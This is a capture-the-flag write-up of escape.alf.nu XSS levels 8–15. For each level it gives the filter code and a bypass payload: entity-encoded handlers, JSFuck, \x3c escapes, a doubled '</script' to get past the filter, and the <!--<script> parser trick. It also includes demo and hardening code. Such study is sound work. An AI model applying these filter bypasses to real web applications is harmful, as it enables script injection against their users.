This article link: http://blog.csdn.net/u012763794/article/details/51526725
Last time I covered challenges 0-7 (http://blog.csdn.net/u012763794/article/details/51507593), probably in more detail than other writeups. Honestly, this needs some hands-on XSS practice (set up an unfiltered page in your own environment to play with) and familiarity with JS.
Straight to the challenges. Note: a level is cleared by getting alert(1) to fire.
Challenge 8
function escape(s) {
  // Courtesy of Skandiabanken
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
This upper-cases our input before dropping it into a JS string inside a script block, so a plain alert(1) becomes ALERT(1), which is not a function.
Let's try HTML entity characters: &# followed by the decimal ASCII code, or hex with an x after the #, e.g. &#x61;. toUpperCase() only changes letters, so we encode just the word alert: &#97;&#108;&#101;&#114;&#116; (the digits survive the conversion). Entities are only decoded in HTML text and attribute values, never inside a script block, so we first close the script and put the encoded name into an event-handler attribute, for example on an img tag.
HTML tag and attribute names are case-insensitive, so the upper-cased </SCRIPT> and <IMG ONERROR=...> mean exactly the same to the browser as the lowercase forms.
It's a bit long; it would be nice to shorten it.
Payload: </script><img ... > (the tag's attributes were stripped from the original page when it was rendered; the svg payloads below are complete)
Other payloads and variations. Decimal entities:
</script><svg onload=&#97;&#108;&#101;&#114;&#116;(1)//
The trailing // turns the rest of the line that lands in the handler (the ") and </script left over from the template) into a JS comment.
Hex entities:
</script><svg onload=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)//
toUpperCase() turns &#x61; into &#X61;, which the HTML parser still accepts as a hexadecimal character reference.
You can also host a JS file containing alert(1); on your own server and load it with </script><script src=//yourhost/...>. Host names are case-insensitive, so the upper-casing does no harm there, but the path is upper-cased too, so serve the file under an upper-case name (or from the root).
With a short domain name the payload gets shorter still; a link-shortener URL probably won't do.
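As an added example (my code, not from the challenge page): level 8's escape function next to a small numeric-character-reference decoder that stands in for what the browser's attribute-value parsing does, so you can see the handler the browser ends up with for a plain payload versus the entity-encoded ones. decodeNumericRefs and onloadHandler are names I made up for this demonstration; the decoder is deliberately minimal (numeric references only).

```javascript
// Level 8 as listed on the page.
function level8(s) {
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}

// Minimal decoder for &#NNN; / &#xHH; references, standing in for what the
// HTML parser does to an attribute value. The x is matched case-insensitively
// because "&#x61;".toUpperCase() is "&#X61;", which HTML still accepts.
function decodeNumericRefs(text) {
  return text.replace(/&#(x?)([0-9a-f]+);?/gi, function (_, x, digits) {
    return String.fromCharCode(parseInt(digits, x ? 16 : 10));
  });
}

// Value of the ONLOAD attribute the browser ends up with: the page's output is
// re-parsed as HTML, </SCRIPT> closes the script block, and the unquoted
// attribute value runs until the next whitespace or ">", which is the ">" of
// the template's own </script>. Returns null if no svg tag survived.
function onloadHandler(payload) {
  const out = level8(payload);
  const m = /<SVG ONLOAD=([^\s>]+)/.exec(out);
  return m ? decodeNumericRefs(m[1]) : null;
}
```

The plain payload `</script><svg onload=alert(1)//` yields a handler of `ALERT(1)//")</script`, which throws; the entity-encoded forms yield `alert(1)//")</script`, where the // swallows the template's tail and alert(1) runs.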
Challenge 9
function escape(s) {
  // This is sort of a spoiler for the last level :-)
  if (/[\\<>]/.test(s)) return '-';
  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
After testing: as soon as the input contains a backslash, < or >, the function returns '-' outright, and the input is still upper-cased. So we can neither close the script tag nor use \u escapes, and every letter we type comes out upper-cased. How do we get a lowercase alert? Anyone who plays CTFs has seen JSFuck, which rewrites arbitrary JS using only the six characters []()!+, none of them letters, so upper-casing leaves it untouched: http://www.jsfuck.com/ . Since the input still lands inside the console.log("...") string, close the string first with "); then put the JSFuck-encoded alert(1), then // to comment out the rest of the line.
That is a lot of characters, though.
I remember seeing another letter-free JS encoding on FreeBuf; I'll write that up another time.
Challenge 10
function escape(s) {
  function htmlEscape(s) {
    return s.replace(/./g, function(x) {
      return {'<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;'}[x] || x;
    });
  }

  function expandTemplate(template, args) {
    return template.replace(/{(\w+)}/g, function(_, n) {
      return htmlEscape(args[n]);
    });
  }

  return expandTemplate("\  /* the template string argument is cut off in the original page */
}
First look at the final return: it calls expandTemplate on a template of HTML and script (the template text was cut off when this page was extracted), and expandTemplate in turn runs each substituted value through htmlEscape.
expandTemplate just replaces {placeholder}s in the template with the HTML-escaped arguments; it adds no protection of its own, and the escaping it applies is for an HTML context even though the value lands inside a JS string literal.
htmlEscape turns single and double quotes, &, < and > into HTML entities, but leaves the backslash escape character alone.
So let's try a hex escape.
Payload: \x3cimg src=123 onerror=alert(1)// (\x3c is the hex escape for the less-than sign)
The value lands inside a JS string literal, and JS decodes \x3c to < when it parses the string; the browser then treats the resulting <img ...> as markup, because the page inserts that string into the document as HTML. The HTML escaping of < and > never saw a real < since it ran before JS decoded the escape.
Other payloads (\x3e is the hex escape for the greater-than sign):
\x3cimg src=123 onerror=alert(1)\x3e
\x3csvg onload=alert(1)// (svg is the inline SVG element that HTML5 allows directly in a document, not canvas; its onload fires as soon as the element is inserted)
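As an added example (my code, not the challenge's): level 10's two helpers, applied to an assumed template that mimics the level by placing {name} inside a single-quoted JS string which is later written into the document as HTML (the real template is truncated on the page). markupFor evaluates the generated script and returns the string the page would hand to the DOM; jsStringEscape and markupForFixed show the fix, which is to escape for the JS-string context as well. TEMPLATE, markupFor, jsStringEscape and markupForFixed are names I made up.

```javascript
// Level 10's helpers as listed on the page.
function htmlEscape(s) {
  return s.replace(/./g, function (x) {
    return {'<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;'}[x] || x;
  });
}

function expandTemplate(template, args) {
  return template.replace(/{(\w+)}/g, function (_, n) {
    return htmlEscape(args[n]);
  });
}

// Assumed template (the real one is cut off on the page): the value lands in a
// single-quoted JS string literal whose content is later used as HTML markup.
const TEMPLATE = "var markup = '<a href=#>{name}</a>';";

// Runs the generated script and returns the markup string it builds, i.e. what
// the page would pass to innerHTML. Stands in for the browser executing the block.
function markupFor(name) {
  const script = expandTemplate(TEMPLATE, { name: name });
  return new Function(script + ' return markup;')();
}

// Escape for a JS string literal: backslash, both quotes and line terminators.
// After this, a user-supplied \x3c stays a literal backslash-x-3-c in the string.
function jsStringEscape(s) {
  return s.replace(/[\\'"\r\n]/g, function (c) {
    return '\\' + ({ '\r': 'r', '\n': 'n' }[c] || c);
  });
}

// Hardened: encode for the innermost context first (HTML, since the value is
// markup), then for the outer one (the JS string literal that carries it).
function markupForFixed(name) {
  const script = TEMPLATE.replace(/{(\w+)}/g, function (_, n) {
    return jsStringEscape(htmlEscape({ name: name }[n]));
  });
  return new Function(script + ' return markup;')();
}
```

Note that the original also breaks on a bare newline in the value (htmlEscape's /./g does not match line terminators, so the string literal is left unterminated); the layered escaping handles that case too.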
Challenge 11
function escape(s) {
  // Spoiler for level 2
  s = JSON.stringify(s).replace(/<\/script/gi, '');
  return '<script>console.log(' + s + ');</script>';
}
JSON.stringify escapes double quotes and backslashes, so we cannot break out of the string. The replace that follows removes every occurrence of </script: the g flag means global (every match, not just the first) and i makes it case-insensitive.
As with SQL injection filters that replace a keyword with nothing, the fix is to double-write: the replace makes a single pass and never re-scans what it produced.
Payload: </sc</scriptript><script>alert(1)//
Removing the inner </script leaves </script><script>alert(1)//, so the page becomes <script>console.log("</script><script>alert(1)//");</script>: the browser closes the first script at our </script> and runs the second one, where // comments out the leftover ");.
The doubled string can of course be split anywhere: </</scriptscript><script>alert(1)//
</s</scriptcript><script>alert(1)//
and so on.
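As an added example (my code, not the challenge's): level 11's single-pass filter, a rough model of how the HTML parser splits its output into script elements, and two hardened variants. scriptElementCount, stripUntilStable and level11Fixed are names I made up; the element counter only splits on </script> and is not a real tokenizer.

```javascript
// Level 11 as listed on the page.
function level11(s) {
  s = JSON.stringify(s).replace(/<\/script/gi, '');
  return '<script>console.log(' + s + ');</script>';
}

// Rough model of what the HTML parser does with the output: split on
// </script> (case-insensitive) and count the chunks that open a script.
// The injected alert shows up as a second script element.
function scriptElementCount(html) {
  return html.split(/<\/script>/i).filter(function (chunk) {
    return /<script>/i.test(chunk);
  }).length;
}

// Hardening option 1: repeat the removal until the string stops changing, so
// nested copies cannot reassemble. Still fragile (other ways of breaking out
// of the block remain); shown only as the minimum that defeats double-writing.
function stripUntilStable(s) {
  let prev;
  do { prev = s; s = s.replace(/<\/script/gi, ''); } while (s !== prev);
  return s;
}

// Hardening option 2 (preferred): never let a raw "<" reach the script block.
// JSON.stringify handles quotes and backslashes; \u003c is the same character
// to the JS engine but invisible to the HTML tokenizer, which never decodes
// escapes inside script data, so no tag can start inside the string.
function level11Fixed(s) {
  const js = JSON.stringify(s).replace(/</g, '\\u003c');
  return '<script>console.log(' + js + ');</script>';
}
```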
Challenge 12
function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1]};
  var json = JSON.stringify(obj).replace(/\//g, '\\/');
  return "<script>" + thing[0] + "(" + json + ")</script>";
}
var thing = s.split(/#/)
splits the input into two parts on #.
if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
The part to the left of the # may only contain letters, square brackets and, importantly, the single quote.
var json = JSON.stringify(obj).replace(/\//g, '\\/');
The right part is JSON-encoded (quotes and backslashes escaped) and every / is replaced with \/, so neither </script> nor a // or /* comment can be written in it.
It turns out an HTML comment opener works as a JS comment too, which keeps this simple.
Close the string with a single quote up front, then comment out the tail.
Payload: '#';alert(1);<!--
The callback is just ', so the page becomes <script>'({"userdata":"';alert(1);<!--"})</script>: the leading ' opens a string literal that ends at the ' we put in userdata, ;alert(1); runs, and <!-- is treated by JS engines as a single-line comment (the Annex B HTML-like comments), hiding the leftover "}). A // comment would not work here because every / has become \/, which is a syntax error outside a string.
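As an added example (my code, not the challenge's): level 12's function, plus a runner that executes the generated script body with a stub alert to show why the <!-- comment works where // is a syntax error. runLevel12 is a name I made up; the runner simply cuts the body out of the <script> wrapper and evaluates it as ordinary (non-module) script code, which is where the Annex B HTML-like comments are honored.

```javascript
// Level 12 as listed on the page.
function level12(s) {
  var thing = s.split(/#/);
  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1]};
  var json = JSON.stringify(obj).replace(/\//g, '\\/');
  return "<script>" + thing[0] + "(" + json + ")</script>";
}

// Executes the generated script body as a browser would, with alert stubbed.
// Returns the arguments alert was called with, and the error name if the body
// did not even parse (which is what happens to a // comment here).
function runLevel12(payload) {
  const html = level12(payload);
  if (!html.startsWith('<script>')) return { error: 'rejected', calls: [] };
  const body = html.slice('<script>'.length, html.lastIndexOf('</script>'));
  const calls = [];
  try {
    new Function('alert', body)(function (x) { calls.push(x); });
  } catch (e) {
    return { error: e.name, calls: calls };
  }
  return { error: null, calls: calls };
}
```

The // variant produces `\/\/` in the script, and a bare backslash outside a string is an invalid token, so the whole script is rejected before anything runs; the <!-- variant parses and fires alert(1).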
Challenge 13
function escape(s) {
  var tag = document.createElement('iframe');

  // For this one, you get to run any code you want, but in a "sandboxed" iframe.
  //
  // http://print.alf.nu/?html= just outputs whatever you pass in.
  //
  // Alerting from print.alf.nu won't count, try to trigger the one below.

  s = '<script>' + s + '<\/script>';
  tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s);

  window.WINNING = function() { youWon = true; };

  tag.onload = function() { if (youWon) alert(1); };

  document.body.appendChild(tag);
}
encodeURIComponent() is just URL encoding.
Look at the iframe. When a frame has a name, that name becomes a property of the parent window object that refers to the frame (named access on Window), like the abc example in the original screenshot.
To put it more plainly:
One more detail: the print.alf.nu URL echoes our input straight back as a script inside the iframe, so our code can set window.name, which is the iframe's name, from the inside.
youWon is never declared on the parent page (nothing ever calls WINNING), so tag.onload would normally throw a ReferenceError; but once the frame is named youWon, the lookup resolves to the frame's window object, which is truthy, and alert(1) fires. The name is case-sensitive, so it must be youWon exactly.
So the payload is: name='youWon'
This relies on the browser letting the parent look up a cross-origin child frame by a name the frame set for itself, so check it in the browser you are using.
Challenge 14
function escape(s) {
  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
  function html(s) { return s.replace(/[<>"&]/g, function(s) {
                        return '&#' + s.charCodeAt(0) + ';'; }); }

  return (
    '<script>' +
      'var url = ' + json(s) + '; // We\'ll use this later ' +
    '</script>\n\n' +
    '<!-- for debugging -->\n' +
    'URL: ' + html(s) + '\n' +
    '<!-- then suddenly -->\n' +
    '<script>\n' +
    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    '  else new Image().src = url;\n' +
    '</script>'
  );
}
First look at the return: it emits two script blocks. The first puts our input, encoded by json(), into var url; between the two, html() prints the input as page text under a debugging comment.
The second script loads our URL into a new Image if it passes the http: check.
json() escapes double quotes and backslashes (JSON.stringify) and turns every / into \/, so neither </script> nor a comment delimiter can be placed literally inside the string.
html() escapes < > " and &.
First let's see what happens.
Since this one is more involved, I'll explain it directly with someone else's payload.
alert(1);/*<!--<script>*/if(/a//*
Copy the generated page into a local file to test.
Two things make this work. At the HTML level, the first </script> does not close the script: inside a script element the sequence <!--<script> puts the tokenizer into its "double escaped" state, in which </script> is swallowed until a --> has been seen, so everything down to the final </script> is parsed as one script. At the JS level, the // in the first line comments out that </script>, the <!-- lines act as line comments, and the /* at the end of our input (in the html() copy) comments out much of what follows (the green part in the screenshot) until the */ hidden inside the regex /^http:.*/ in the second block. Stripping the commented-out parts, the code simplifies to:
var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*";
URL: alert(1); if (/a/.test(url)) console.log("Bad url: " + url); else new Image().src = url;
That is a bit easier to read.
Challenge 15
function escape(s) {
  return s.split('#').map(function(v) {
    // Only 20% of slashes are end tags; save 1.2% of total
    // bytes by only escaping those.
    var json = JSON.stringify(v).replace(/<\//g, '<\\/');
    return '<script>console.log(' + json + ')</script>';
  }).join('');
}
Payload: <!--<script>#)/;alert(1)//-->
Generated code: <script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")</script>
Copy it into a local file.
The same <!--<script> trick as in level 14 makes the HTML parser swallow the </script> in the middle, so the browser runs everything between the outer tags as one script. Type that middle part straight into the console:
console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")
Simplified, it is console.log("<!--<script>")</script><script>console.log(")/; alert(1)
i.e. console.log(...) < /regular expression/ ; alert(1): the < becomes a less-than operator, /script><script>console.log(")/ is a regex literal (the ) in the second half balances the ( so the pattern is valid), then ; alert(1) runs and // comments out the rest.
So it is syntactically correct:
it is actually two statements.
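As an added example that is not part of the original post, covering levels 14 and 15 together: a simplified model of the HTML tokenizer's script-data states (it tracks only <!--, <script>, --> and </script> and ignores everything else, which is all the double-escaped rule needs), the level 14 and 15 functions as reconstructed from the listings above (whitespace may differ from alf.nu's originals), and a stub runner that executes the JS the model hands to the engine. scriptContentEnd, firstScriptBody, runFirstScript and the LEVEL1x_PAYLOAD constants are my names.

```javascript
// Simplified model of the HTML "script data" tokenizer. Returns the index at
// which the script element that starts at `from` really ends. Inside <!-- ... -->
// a <script> switches to the "double escaped" state, where </script> is swallowed.
function scriptContentEnd(html, from) {
  let state = 'data';  // 'data' | 'escaped' (after <!--) | 'doubleEscaped' (after <!--<script>)
  let i = from;
  while (i < html.length) {
    const ahead = html.slice(i, i + 9).toLowerCase();
    if (ahead.startsWith('</script>')) {
      if (state !== 'doubleEscaped') return i;  // the element really ends here
      state = 'escaped';                         // swallowed: still inside the element
      i += 9;
    } else if (ahead.startsWith('<script>')) {
      if (state === 'escaped') state = 'doubleEscaped';
      i += 8;
    } else if (ahead.startsWith('<!--')) {
      if (state === 'data') state = 'escaped';
      i += 4;
    } else if (ahead.startsWith('-->')) {
      state = 'data';
      i += 3;
    } else {
      i += 1;
    }
  }
  return html.length;
}

// Level 14, reconstructed from the listing above.
function level14(s) {
  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
  function html(s) { return s.replace(/[<>"&]/g, function (c) { return '&#' + c.charCodeAt(0) + ';'; }); }
  return (
    '<script>' + 'var url = ' + json(s) + '; // We\'ll use this later ' + '</script>\n\n' +
    '<!-- for debugging -->\n' + 'URL: ' + html(s) + '\n' +
    '<!-- then suddenly -->\n' + '<script>\n' +
    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    '  else new Image().src = url;\n' + '</script>'
  );
}

// Level 15, reconstructed from the listing above.
function level15(s) {
  return s.split('#').map(function (v) {
    var json = JSON.stringify(v).replace(/<\//g, '<\\/');
    return '<script>console.log(' + json + ')</script>';
  }).join('');
}

// The first script element's JS as the tokenizer model would deliver it.
function firstScriptBody(page) {
  const start = page.indexOf('<script>') + '<script>'.length;
  return page.slice(start, scriptContentEnd(page, start));
}

// Executes that JS with alert, Image and console stubbed; returns the calls made.
// new Function runs the body as ordinary (non-module) script code, so the
// Annex B HTML-like comments behave as they do in a browser's inline script.
function runFirstScript(page) {
  const calls = [];
  const alert = function (x) { calls.push('alert(' + x + ')'); };
  const Image = function () {};
  const fakeConsole = { log: function (m) { calls.push('log(' + m + ')'); } };
  new Function('alert', 'Image', 'console', firstScriptBody(page))(alert, Image, fakeConsole);
  return calls;
}

const LEVEL14_PAYLOAD = 'alert(1);/*<!--<script>*/if(/a//*';
const LEVEL15_PAYLOAD = '<!--<script>#)/;alert(1)//-->';
```

For level 14 the extracted body runs all the way to `new Image().src = url`, proving the first </script> was swallowed, and the first call recorded is alert(1) (the second is the "Bad url" log, since /a/.test(url) is true). For level 15 the body is the two console.log halves joined, and alert(1) is the second call after the log of the first half.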
That's all; comments and discussion are welcome.
Escape.alf.nu XSS challenges 8-15 Advanced XSS